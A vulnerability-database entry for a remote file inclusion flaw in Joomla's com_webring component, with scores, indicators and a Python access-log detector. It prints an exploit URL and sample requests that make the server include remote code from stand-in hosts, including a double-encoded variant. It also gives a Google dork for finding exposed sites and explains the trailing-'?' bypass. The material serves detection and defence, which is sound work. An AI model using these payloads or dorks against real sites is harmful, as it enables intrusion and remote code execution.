CVE-2006-4129
published 2006-08-14

Priority: P3 41
CVSS 2.0: 7.5 (high), vector AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.28% (86.9th percentile)

PHP remote file inclusion vulnerability in admin.webring.docs.php in the Webring Component (com_webring) 1.0 and earlier for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the component_dir parameter.

Affected

1 range

Vendor    Product              Version range    Fixed in
joomla    webring_component

Detection & IOCs (extracted from sources)

path: /administrator/components/com_webring/admin.webring.docs.php
url: http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
filename: admin.webring.docs.php
  • Look for HTTP requests targeting the component_dir parameter in admin.webring.docs.php with an external URL value, indicating remote file inclusion attempt.
  • The vulnerable code path is require_once($component_dir. "mungdocs.class.php") at line 12 of admin.webring.docs.php — monitor for unsanitized URL-based values passed to this include.
  • Use the Google dork 'inurl:com_webring' to identify exposed vulnerable Joomla installations.
  • The exploit URL uses a trailing '?' after the injected URL so that the appended filename (mungdocs.class.php) becomes part of the query string and is ignored; this is a common RFI bypass technique that detection signatures must account for.
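
A detector for the request pattern described in the bullets above, as an added example (not from the original advisory or the component's code): it scans access-log lines for a component_dir value that decodes to a remote URL, undoing layered percent-encoding and recording the trailing '?' trick. The log lines, the evil.example host and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

TARGET = "/admin.webring.docs.php"
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any scheme:// prefix (http, https, ftp, php, ...) or a protocol-relative //host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.I)

SAMPLE_LOG = [  # constructed entries, not taken from a real server
    '203.0.113.5 - - [14/Aug/2006:10:00:01 +0000] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil.example/shell.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [14/Aug/2006:10:00:09 +0000] "GET /joomla/administrator/components/com_webring/admin.webring.docs.php?component_dir=%2568ttp%253A%252F%252Fevil.example%252Fs.txt%253F HTTP/1.1" 200 512',
    '198.51.100.7 - - [14/Aug/2006:10:01:00 +0000] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=components/com_webring/ HTTP/1.1" 200 2048',
    '198.51.100.7 - - [14/Aug/2006:10:02:00 +0000] "GET /index.php?option=com_content&url=http://example.org/ HTTP/1.1" 200 4096',
]


def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (double-encoding evasion)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_line(line):
    """Return a finding dict if the line is an RFI attempt on component_dir, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not fully_unquote(parts.path).lower().endswith(TARGET):
        return None
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_unquote(raw)
        if name == "component_dir" and REMOTE_RE.match(value):
            # A trailing '?' turns the appended mungdocs.class.php into a query string.
            return {"value": value, "suffix_stripped": value.rstrip().endswith("?")}
    return None


def scan(lines):
    """Return (line_number, finding) pairs for every suspicious entry."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := check_line(line))]


if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

This matches query strings only, since access logs do not record request bodies.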